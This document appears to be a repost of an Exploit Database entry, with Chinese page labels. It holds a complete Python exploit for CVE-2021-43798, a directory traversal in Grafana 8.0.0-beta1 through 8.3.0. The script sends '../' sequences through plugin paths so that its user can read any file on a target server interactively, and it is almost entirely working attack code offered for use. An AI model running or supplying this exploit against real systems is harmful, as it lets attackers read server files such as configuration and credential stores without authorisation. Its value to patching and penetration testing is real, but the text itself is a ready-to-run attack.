Grafana 8.3.0 – Directory Traversal and Arbitrary File Read

• Exploit Database
• 12 阅读

• 作者： s1gh
  日期： 2021-12-09
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50581/

• # Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
  # Date: 08/12/2021
  # Exploit Author: s1gh
  # Vendor Homepage: https://grafana.com/
  # Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  # Version: V8.0.0-beta1 through V8.3.0
  # Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
  # CVE: CVE-2021-43798
  # Tested on: Debian 10
  # References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p
  
  #!/usr/bin/env python3
  # -*- coding: utf-8 -*-
  
  import requests
  import argparse
  import sys
  from random import choice
  
  plugin_list = [
  "alertlist",
  "annolist",
  "barchart",
  "bargauge",
  "candlestick",
  "cloudwatch",
  "dashlist",
  "elasticsearch",
  "gauge",
  "geomap",
  "gettingstarted",
  "grafana-azure-monitor-datasource",
  "graph",
  "heatmap",
  "histogram",
  "influxdb",
  "jaeger",
  "logs",
  "loki",
  "mssql",
  "mysql",
  "news",
  "nodeGraph",
  "opentsdb",
  "piechart",
  "pluginlist",
  "postgres",
  "prometheus",
  "stackdriver",
  "stat",
  "state-timeline",
  "status-histor",
  "table",
  "table-old",
  "tempo",
  "testdata",
  "text",
  "timeseries",
  "welcome",
  "zipkin"
  ]
  
  def exploit(args):
  s = requests.Session()
  headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }
  
  while True:
  file_to_read = input('Read file > ')
  
  try:
  url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
  req = requests.Request(method='GET', url=url, headers=headers)
  prep = req.prepare()
  prep.url = url
  r = s.send(prep, verify=False, timeout=3)
  
  if 'Plugin file not found' in r.text:
  print('[-] File not found\n')
  else:
  if r.status_code == 200:
  print(r.text)
  else:
  print('[-] Something went wrong.')
  return
  except requests.exceptions.ConnectTimeout:
  print('[-] Request timed out. Please check your host settings.\n')
  return
  except Exception:
  pass
  
  def main():
  parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
  parser.add_argument('-H',dest='host',required=True, help="Target host")
  args = parser.parse_args()
  
  try:
  exploit(args)
  except KeyboardInterrupt:
  return
  
  
  if __name__ == '__main__':
  main()
  sys.exit(0)